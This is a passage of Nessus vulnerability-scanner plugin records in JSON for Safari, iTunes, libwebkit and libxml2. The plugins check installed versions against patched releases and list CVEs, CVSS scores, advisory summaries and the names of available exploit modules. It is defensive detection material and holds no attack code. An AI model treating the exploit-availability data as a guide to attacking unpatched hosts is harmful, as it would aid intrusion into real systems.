script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nif (!ereg(pattern:\"Mac OS X 10\\.[56]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.5 / 10.6\");\n\n\nget_kb_item_or_exit(\"MacOSX/Safari/Installed\");\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nif (\"10.5\" >< os) fixed_version = \"5.0.5\";\nelse fixed_version = \"5.1\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Safari\", version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:11", "bulletinFamily": "scanner", "description": "The version of Safari installed on the remote Windows host is earlier than 5.1. As such, it is potentially affected by numerous issues in the following components :\n\n - CFNetwork\n - ColorSync\n - CoreFoundation\n - CoreGraphics\n - International Components for Unicode\n - ImageIO\n - libxslt\n - libxml\n - Safari\n - WebKit", "modified": "2018-07-27T00:00:00", "id": "SAFARI_5_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=55639", "published": "2011-07-21T00:00:00", "title": "Safari < 5.1 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55639);\n script_version(\"1.47\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\n \"CVE-2010-1383\",\n \"CVE-2010-1420\",\n \"CVE-2010-1823\",\n \"CVE-2010-3829\",\n \"CVE-2011-0164\",\n \"CVE-2011-0195\",\n \"CVE-2011-0200\",\n \"CVE-2011-0201\",\n \"CVE-2011-0202\",\n \"CVE-2011-0204\",\n \"CVE-2011-0206\",\n \"CVE-2011-0214\",\n \"CVE-2011-0215\",\n \"CVE-2011-0216\",\n \"CVE-2011-0217\",\n \"CVE-2011-0218\",\n \"CVE-2011-0219\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0241\",\n \"CVE-2011-0242\",\n \"CVE-2011-0244\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1107\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1190\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1295\",\n \"CVE-2011-1296\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-3443\"\n );\n script_bugtraq_id(\n 43228,\n 46262,\n 46614,\n 46703,\n 46785,\n 47029,\n 47604,\n 47668,\n 48416,\n 48426,\n 48427,\n 48429,\n 48437,\n 48820,\n 48823,\n 48824,\n 48825,\n 48827,\n 48828,\n 48831,\n 48832,\n 48833,\n 48837,\n 48839,\n 48840,\n 48841,\n 48842,\n 48843,\n 48844,\n 48845,\n 48846,\n 48847,\n 48848,\n 48849,\n 48850,\n 48851,\n 48852,\n 48853,\n 48854,\n 48855,\n 48856,\n 48857,\n 48858,\n 48859,\n 48860\n );\n script_xref(name:\"EDB-ID\", value:\"17575\");\n script_xref(name:\"EDB-ID\", value:\"17993\");\n script_xref(name:\"MSVR\", value:\"MSVR11-009\");\n\n script_name(english:\"Safari < 5.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Safari's version number\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Safari installed on the remote Windows host is earlier\nthan 5.1. As such, it is potentially affected by numerous issues in\nthe following components :\n\n - CFNetwork\n - ColorSync\n - CoreFoundation\n - CoreGraphics\n - International Components for Unicode\n - ImageIO\n - libxslt\n - libxml\n - Safari\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT4808\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Safari 5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"safari_installed.nasl\");\n script_require_keys(\"SMB/Safari/FileVersion\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/Safari/FileVersion\");\n\nversion_ui = get_kb_item(\"SMB/Safari/ProductVersion\");\nif (isnull(version_ui)) version_ui = version;\n\nif (ver_compare(ver:version, fix:\"5.34.50.0\") == -1)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item(\"SMB/Safari/Path\");\n if (isnull(path)) path = \"n/a\";\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_ui +\n '\\n Fixed version : 5.1 (7534.50)\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"The remote host is not affected since Safari \" + version_ui + \" is installed.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:28", "bulletinFamily": "scanner", "description": "The version of Apple iTunes on the remote host is prior to version 10.5. It is, therefore, affected by multiple vulnerabilities in the CoreAudio, CoreFoundation, CoreMedia, ColorSync, ImageIO, and WebKit components. Note that these only affect iTunes for Windows.", "modified": "2018-11-15T00:00:00", "id": "ITUNES_10_5_BANNER.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56470", "published": "2011-10-12T00:00:00", "title": "Apple iTunes < 10.5 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0); # Avoid problems with large number of xrefs.\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56470);\n script_version(\"1.48\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\n \"CVE-2010-1823\",\n \"CVE-2011-0164\",\n \"CVE-2011-0200\",\n \"CVE-2011-0204\",\n \"CVE-2011-0215\",\n \"CVE-2011-0218\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0259\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1296\",\n \"CVE-2011-1440\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-2338\",\n \"CVE-2011-2339\",\n \"CVE-2011-2341\",\n \"CVE-2011-2351\",\n \"CVE-2011-2352\",\n \"CVE-2011-2354\",\n \"CVE-2011-2356\",\n \"CVE-2011-2359\",\n \"CVE-2011-2788\",\n \"CVE-2011-2790\",\n \"CVE-2011-2792\",\n \"CVE-2011-2797\",\n \"CVE-2011-2799\",\n \"CVE-2011-2809\",\n \"CVE-2011-2811\",\n \"CVE-2011-2813\",\n \"CVE-2011-2814\",\n \"CVE-2011-2815\",\n \"CVE-2011-2816\",\n \"CVE-2011-2817\",\n \"CVE-2011-2818\",\n \"CVE-2011-2820\",\n \"CVE-2011-2823\",\n \"CVE-2011-2827\",\n \"CVE-2011-2831\",\n \"CVE-2011-3219\",\n \"CVE-2011-3232\",\n \"CVE-2011-3233\",\n \"CVE-2011-3234\",\n \"CVE-2011-3235\",\n \"CVE-2011-3236\",\n \"CVE-2011-3237\",\n \"CVE-2011-3238\",\n \"CVE-2011-3239\",\n \"CVE-2011-3241\",\n \"CVE-2011-3244\",\n \"CVE-2011-3252\"\n );\n script_bugtraq_id(\n 46262,\n 46614,\n 46785,\n 47029,\n 47604,\n 48437,\n 48479,\n 48840,\n 48856,\n 48960,\n 49279,\n 49658,\n 49850,\n 50065,\n 50066,\n 50067,\n 50068\n );\n script_xref(name:\"MSVR\", value:\"MSVR11-001\");\n\n script_name(english:\"Apple iTunes < 10.5 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a multimedia application that has multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes on the remote host is prior to version\n10.5. It is, therefore, affected by multiple vulnerabilities in the\nCoreAudio, CoreFoundation, CoreMedia, ColorSync, ImageIO, and WebKit\ncomponents. Note that these only affect iTunes for Windows.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-303/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-304/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT4981\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/security-announce/2011/Oct/msg00000.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple iTunes 10.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"10.5\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:27", "bulletinFamily": "scanner", "description": "The version of Apple iTunes installed on the remote Windows host is older than 10.5. Thus, it is reportedly affected by numerous issues in the following components :\n\n - CoreFoundation\n - ColorSync\n - CoreAudio\n - CoreMedia\n - ImageIO\n - WebKit", "modified": "2018-11-15T00:00:00", "id": "ITUNES_10_5.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56469", "published": "2011-10-12T00:00:00", "title": "Apple iTunes < 10.5 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0); # Avoid problems with large number of xrefs.\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(56469);\n script_version(\"1.45\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2010-1823\",\n \"CVE-2011-0164\",\n \"CVE-2011-0200\",\n \"CVE-2011-0204\",\n \"CVE-2011-0215\",\n \"CVE-2011-0218\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0259\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1296\",\n \"CVE-2011-1440\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-2338\",\n \"CVE-2011-2339\",\n \"CVE-2011-2341\",\n \"CVE-2011-2351\",\n \"CVE-2011-2352\",\n \"CVE-2011-2354\",\n \"CVE-2011-2356\",\n \"CVE-2011-2359\",\n \"CVE-2011-2788\",\n \"CVE-2011-2790\",\n \"CVE-2011-2792\",\n \"CVE-2011-2797\",\n \"CVE-2011-2799\",\n \"CVE-2011-2809\",\n \"CVE-2011-2811\",\n \"CVE-2011-2813\",\n \"CVE-2011-2814\",\n \"CVE-2011-2815\",\n \"CVE-2011-2816\",\n \"CVE-2011-2817\",\n \"CVE-2011-2818\",\n \"CVE-2011-2820\",\n \"CVE-2011-2823\",\n \"CVE-2011-2827\",\n \"CVE-2011-2831\",\n \"CVE-2011-3219\",\n \"CVE-2011-3232\",\n \"CVE-2011-3233\",\n \"CVE-2011-3234\",\n \"CVE-2011-3235\",\n \"CVE-2011-3236\",\n \"CVE-2011-3237\",\n \"CVE-2011-3238\",\n \"CVE-2011-3239\",\n \"CVE-2011-3241\",\n \"CVE-2011-3244\",\n \"CVE-2011-3252\"\n );\n script_bugtraq_id(\n 46262,\n 46614,\n 46785,\n 47029,\n 47604,\n 48437,\n 48479,\n 48840,\n 48856,\n 48960,\n 49279,\n 49658,\n 49850,\n 50065,\n 50066,\n 50067,\n 50068\n );\n script_xref(name:\"MSVR\", value:\"MSVR11-001\");\n\n script_name(english:\"Apple iTunes < 10.5 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks version of iTunes on Windows\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a multimedia application that has multiple\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apple iTunes installed on the remote Windows host is\nolder than 10.5. Thus, it is reportedly affected by numerous issues in\nthe following components :\n\n - CoreFoundation\n - ColorSync\n - CoreAudio\n - CoreMedia\n - ImageIO\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-303/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-304/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT4981\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apple.com/archives/security-announce/2011/Oct/msg00000.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple iTunes 10.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-678\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"SMB/iTunes/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"SMB/iTunes/Version\");\nfixed_version = \"10.5.0.142\";\n\nif (ver_compare(ver:version, fix:fixed_version) == -1)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item(\"SMB/iTunes/Path\");\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version+\n '\\n Fixed version : '+fixed_version+'\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"The host is not affected since iTunes \"+version+\" is installed.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:13", "bulletinFamily": "scanner", "description": "This update of libwebkit fixes :\n\n - XSLT file creation allowed webpages evaluating XSLT code to create files. (CVE-2011-1774)\n\n - ZDI-11-139 Webkit Anonymous Frame remote code exec", "modified": "2013-10-25T00:00:00", "id": "SUSE_11_LIBWEBKIT-110725.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=55728", "published": "2011-07-29T00:00:00", "title": "SuSE 11.1 Security Update : libwebkit (SAT Patch Number 4917)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55728);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:01 $\");\n\n script_cve_id(\"CVE-2011-1774\");\n\n script_name(english:\"SuSE 11.1 Security Update : libwebkit (SAT Patch Number 4917)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of libwebkit fixes :\n\n - XSLT file creation allowed webpages evaluating XSLT code\n to create files. (CVE-2011-1774)\n\n - ZDI-11-139 Webkit Anonymous Frame remote code exec\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=688691\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=692619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-1774.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 4917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apple Safari Webkit libxslt Arbitrary File Creation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwebkit-1_0-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libwebkit-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libwebkit-1_0-2-1.2.7-0.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libwebkit-lang-1.2.7-0.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwebkit-1_0-2-1.2.7-0.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libwebkit-lang-1.2.7-0.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:15:48", "bulletinFamily": "scanner", "description": "Multiple vulnerabilities has been discovered and corrected in libxml2 :\n\nOff-by-one error in libxml allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow and application crash) via a crafted website CVE-2011-0216).\n\nlibxml2 allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\nThe updated packages have been patched to correct these issues.", "modified": "2018-07-19T00:00:00", "id": "MANDRIVA_MDVSA-2011-188.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57320", "published": "2011-12-16T00:00:00", "title": "Mandriva Linux Security Advisory : libxml2 (MDVSA-2011:188)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:188. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57320);\n script_version(\"1.9\");\n 